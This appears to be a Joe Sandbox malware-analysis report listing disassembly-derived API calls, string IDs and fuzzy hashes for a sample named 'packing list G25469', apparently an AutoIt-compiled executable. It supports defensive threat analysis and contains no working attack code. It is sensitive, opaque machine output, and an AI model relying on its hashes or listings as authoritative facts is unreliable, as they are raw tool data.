                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 633005966e1ba79efc4612abcf237dd3c5dbed96338143f3745e7c3529938130
                                                  • Instruction ID: cb78216ef6652a7ec4f564c8c0bb3cb42fc39c57035eb7ce6ce84b8a3626b671
                                                  • Opcode Fuzzy Hash: 633005966e1ba79efc4612abcf237dd3c5dbed96338143f3745e7c3529938130
                                                  • Instruction Fuzzy Hash: F1025A75604601AFCB14EF14C895A2EB7E5FF88720F1485ADF98A9B3A1DB70ED01CB85
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00B96C56
                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B96D16
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                  • API String ID: 3974292440-719923060
                                                  • Opcode ID: 4650eb74268b35edea8f87c4b74eac6b49085b0779bfbc6268ddb12919a536aa
                                                  • Instruction ID: 665c1b22aa029f0b2f102fe4d6226bce85ff328104c8da9caf9f94a964b2005e
                                                  • Opcode Fuzzy Hash: 4650eb74268b35edea8f87c4b74eac6b49085b0779bfbc6268ddb12919a536aa
                                                  • Instruction Fuzzy Hash: 80A15A346042459FCB14EF24C991A6AB3E5FF54314F1089F9B8A6AB292DB30ED06DB52
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B6CF91
                                                  • __swprintf.LIBCMT ref: 00B6D032
                                                  • _wcscmp.LIBCMT ref: 00B6D045
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B6D09A
                                                  • _wcscmp.LIBCMT ref: 00B6D0D6
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B6D10D
                                                  • GetDlgCtrlID.USER32(?), ref: 00B6D15F
                                                  • GetWindowRect.USER32(?,?), ref: 00B6D195
                                                  • GetParent.USER32(?), ref: 00B6D1B3
                                                  • ScreenToClient.USER32(00000000), ref: 00B6D1BA
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B6D234
                                                  • _wcscmp.LIBCMT ref: 00B6D248
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B6D26E
                                                  • _wcscmp.LIBCMT ref: 00B6D282
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                  • String ID: %s%u
                                                  • API String ID: 3119225716-679674701
                                                  • Opcode ID: 4016c1aab3d02b574dbc569d9697532b55651c3c2ba99acb4005972430946866
                                                  • Instruction ID: c30157b4ece87cbab5fa0d0329911569e2b3e26e8ea8fc3de47b86818a7960f0
                                                  • Opcode Fuzzy Hash: 4016c1aab3d02b574dbc569d9697532b55651c3c2ba99acb4005972430946866
                                                  • Instruction Fuzzy Hash: 33A1C071A04306AFD714DF64C894FAAB7E8FF44314F008A99F99993190EB78E945CB91
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00B6D8EB
                                                  • _wcscmp.LIBCMT ref: 00B6D8FC
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B6D924
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00B6D941
                                                  • _wcscmp.LIBCMT ref: 00B6D95F
                                                  • _wcsstr.LIBCMT ref: 00B6D970
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B6D9A8
                                                  • _wcscmp.LIBCMT ref: 00B6D9B8
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B6D9DF
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B6DA28
                                                  • _wcscmp.LIBCMT ref: 00B6DA38
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00B6DA60
                                                  • GetWindowRect.USER32(00000004,?), ref: 00B6DAC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: cf7410f573aa46bba17aef9c1dfdabf2bbb0bc6b1d6805d43af826089f86bc8b
                                                  • Instruction ID: 4ac164574705c15d4be247e8c2d895638094762a37365d02064f0e9705cb6c14
                                                  • Opcode Fuzzy Hash: cf7410f573aa46bba17aef9c1dfdabf2bbb0bc6b1d6805d43af826089f86bc8b
                                                  • Instruction Fuzzy Hash: D881E5316083059BDB01CF50C881FAA7BE8FF84314F1885E9FE899A095EB38DD45CBA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: fe47f693b758b575bffe625f7d8f6ac83e149b22abe7515a58df09385ab59569
                                                  • Instruction ID: e309fbacbd906953e0d3d1c9a6668a99f9e02a070e73b9f6ebfdc405c70feb99
                                                  • Opcode Fuzzy Hash: fe47f693b758b575bffe625f7d8f6ac83e149b22abe7515a58df09385ab59569
                                                  • Instruction Fuzzy Hash: 32316F31A44349A6DB14FB61DE83FEDB3E99F20711F3005E9F441720E5FB65AE048652
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 00B6EAB0
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B6EAC2
                                                  • SetWindowTextW.USER32(?,?), ref: 00B6EAD9
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B6EAEE
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B6EAF4
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B6EB04
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B6EB0A
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B6EB2B
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B6EB45
                                                  • GetWindowRect.USER32(?,?), ref: 00B6EB4E
                                                  • SetWindowTextW.USER32(?,?), ref: 00B6EBB9
                                                  • GetDesktopWindow.USER32 ref: 00B6EBBF
                                                  • GetWindowRect.USER32(00000000), ref: 00B6EBC6
                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B6EC12
                                                  • GetClientRect.USER32(?,?), ref: 00B6EC1F
                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B6EC44
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B6EC6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                  • String ID:
                                                  • API String ID: 3869813825-0
                                                  • Opcode ID: 0f00c4c7e0145ac15e4e73bb167ec360edd35212a4f29189291121635f43400d
                                                  • Instruction ID: 27a237288a2960849add25153cf16cb9dec28fa8df99f47495de8cd2fc822699
                                                  • Opcode Fuzzy Hash: 0f00c4c7e0145ac15e4e73bb167ec360edd35212a4f29189291121635f43400d
                                                  • Instruction Fuzzy Hash: 64512E75900709AFDB209FA8CD85F6EBBF5FF04704F004A68E556A75A0DB78E945CB10
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00B879C6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00B879D1
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00B879DC
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00B879E7
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00B879F2
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00B879FD
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00B87A08
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00B87A13
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00B87A1E
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00B87A29
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00B87A34
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00B87A3F
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00B87A4A
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00B87A55
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00B87A60
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00B87A6B
                                                  • GetCursorInfo.USER32(?), ref: 00B87A7B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$Info
                                                  • String ID:
                                                  • API String ID: 2577412497-0
                                                  • Opcode ID: bf051f2773783ade2f8fd3925755defcd1dff24a4f12264181a697af929d0a9b
                                                  • Instruction ID: f251d19e19061441da9c74bd05347559c66c5255e5c337df3ca0733779844292
                                                  • Opcode Fuzzy Hash: bf051f2773783ade2f8fd3925755defcd1dff24a4f12264181a697af929d0a9b
                                                  • Instruction Fuzzy Hash: 7B3105B1D4831A6ADB109FB68C8999FBFE8FF04754F50452AE50DE7281DA78A500CFA1
                                                  APIs
                                                    • Part of subcall function 00B4E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B3C8B7,?,00002000,?,?,00000000,?,00B3419E,?,?,?,00BCDC00), ref: 00B4E984
                                                    • Part of subcall function 00B3660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B353B1,?,?,00B361FF,?,00000000,00000001,00000000), ref: 00B3662F
                                                  • __wsplitpath.LIBCMT ref: 00B3C93E
                                                    • Part of subcall function 00B51DFC: __wsplitpath_helper.LIBCMT ref: 00B51E3C
                                                  • _wcscpy.LIBCMT ref: 00B3C953
                                                  • _wcscat.LIBCMT ref: 00B3C968
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B3C978
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B3CABE
                                                    • Part of subcall function 00B3B337: _wcscpy.LIBCMT ref: 00B3B36F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 2258743419-1018226102
                                                  • Opcode ID: 9349a5e03b8c8f463b366c88b6b3e62d6aa28aff494f9307dbf4517f6a221ae8
                                                  • Instruction ID: 9ad1e6aa64ce0eaf4ff3fcb5db2946f01fd2c2426eadf9967b3487ce746c488e
                                                  • Opcode Fuzzy Hash: 9349a5e03b8c8f463b366c88b6b3e62d6aa28aff494f9307dbf4517f6a221ae8
                                                  • Instruction Fuzzy Hash: 70129D7150C3419FC724EF64C881AAFBBE5EF99700F1049AEF599A3261DB30DA49CB52
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B9CEFB
                                                  • DestroyWindow.USER32(?,?), ref: 00B9CF73
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B9CFF4
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B9D016
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9D025
                                                  • DestroyWindow.USER32(?), ref: 00B9D042
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B30000,00000000), ref: 00B9D075
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9D094
                                                  • GetDesktopWindow.USER32 ref: 00B9D0A9
                                                  • GetWindowRect.USER32(00000000), ref: 00B9D0B0
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B9D0C2
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B9D0DA
                                                    • Part of subcall function 00B4B526: GetWindowLongW.USER32(?,000000EB), ref: 00B4B537
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 3877571568-3619404913
                                                  • Opcode ID: 28c3fe62618f924451107ce334924cb3faa56b35e90674bd070680c829027cfe
                                                  • Instruction ID: 15c748d24dd8b350fcca080c97a3fcb75a4576253b93e09ab9bd49fe7aaa4bdb
                                                  • Opcode Fuzzy Hash: 28c3fe62618f924451107ce334924cb3faa56b35e90674bd070680c829027cfe
                                                  • Instruction Fuzzy Hash: ED71DE74140305AFDB20CF29CC95FB67BE5EB88704F144A6DF985872A1DB74E946CB22
                                                  APIs
                                                    • Part of subcall function 00B4B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B4B35F
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00B9F37A
                                                    • Part of subcall function 00B9D7DE: ClientToScreen.USER32(?,?), ref: 00B9D807
                                                    • Part of subcall function 00B9D7DE: GetWindowRect.USER32(?,?), ref: 00B9D87D
                                                    • Part of subcall function 00B9D7DE: PtInRect.USER32(?,?,00B9ED5A), ref: 00B9D88D
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9F3E3
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B9F3EE
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B9F411
                                                  • _wcscat.LIBCMT ref: 00B9F441
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B9F458
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9F471
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B9F488
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B9F4AA
                                                  • DragFinish.SHELL32(?), ref: 00B9F4B1
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B9F59C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: c32c484d20704c90dea07f336e38ca391d6d836b95d7a9cb9ac46f7968cbb8ce
                                                  • Instruction ID: 074b2efe88aa3f5978e47e2d692f7161c2ae9e4883a3c69d9833e71bc219a291
                                                  • Opcode Fuzzy Hash: c32c484d20704c90dea07f336e38ca391d6d836b95d7a9cb9ac46f7968cbb8ce
                                                  • Instruction Fuzzy Hash: 11615A71508301AFC701EF64DC85DABBBF8EF89710F500A6EF595932A1DB709A09CB52
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000000), ref: 00B7AB3D
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B7AB46
                                                  • VariantClear.OLEAUT32(?), ref: 00B7AB52
                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B7AC40
                                                  • __swprintf.LIBCMT ref: 00B7AC70
                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00B7AC9C
                                                  • VariantInit.OLEAUT32(?), ref: 00B7AD4D
                                                  • SysFreeString.OLEAUT32(00000016), ref: 00B7ADDF
                                                  • VariantClear.OLEAUT32(?), ref: 00B7AE35
                                                  • VariantClear.OLEAUT32(?), ref: 00B7AE44
                                                  • VariantInit.OLEAUT32(00000000), ref: 00B7AE80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                  • API String ID: 3730832054-3931177956
                                                  • Opcode ID: f5f0218c3c93cf9e874d51e6b4b7d86fe954d1d63e3bbe84bdb07dd413d3c969
                                                  • Instruction ID: 0872fdba807a02d9a31ae13bdc54c6c1bf5130c193c0161c297be52f5de22c44
                                                  • Opcode Fuzzy Hash: f5f0218c3c93cf9e874d51e6b4b7d86fe954d1d63e3bbe84bdb07dd413d3c969
                                                  • Instruction Fuzzy Hash: E0D1E271600115EBCB649F65C884B6EB7F5FF84B00F24C4E5E42AAB281DB74ED44DBA2
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00B971FC
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B97247
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: cadecec708a0665afc5a7c844cecf6f49b346651ec079b94c8dcbe630a4f3350
                                                  • Instruction ID: 9c7b806a2378651ec7f608a14090af1a9d1e76f8f9e7df7f87beaa0046b9d2ec
                                                  • Opcode Fuzzy Hash: cadecec708a0665afc5a7c844cecf6f49b346651ec079b94c8dcbe630a4f3350
                                                  • Instruction Fuzzy Hash: 51914D742586019BCB04EF24C491A6EBBE1FF55310F1048E9B8966B3A3DB74ED06DB86
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B9E5AB
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B9BEAF), ref: 00B9E607
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9E647
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9E68C
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9E6C3
                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00B9BEAF), ref: 00B9E6CF
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B9E6DF
                                                  • DestroyIcon.USER32(?,?,?,?,?,00B9BEAF), ref: 00B9E6EE
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B9E70B
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B9E717
                                                    • Part of subcall function 00B50FA7: __wcsicmp_l.LIBCMT ref: 00B51030
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: 0d7a63cc22723f3199e4b314f45c79d4e733af08c2d4763be1d28f2d1fb2dc00
                                                  • Instruction ID: 7b0da8f5b24d846d49103c71f21bc062efee5c6a0b2bdc5d059a1f98d768a78a
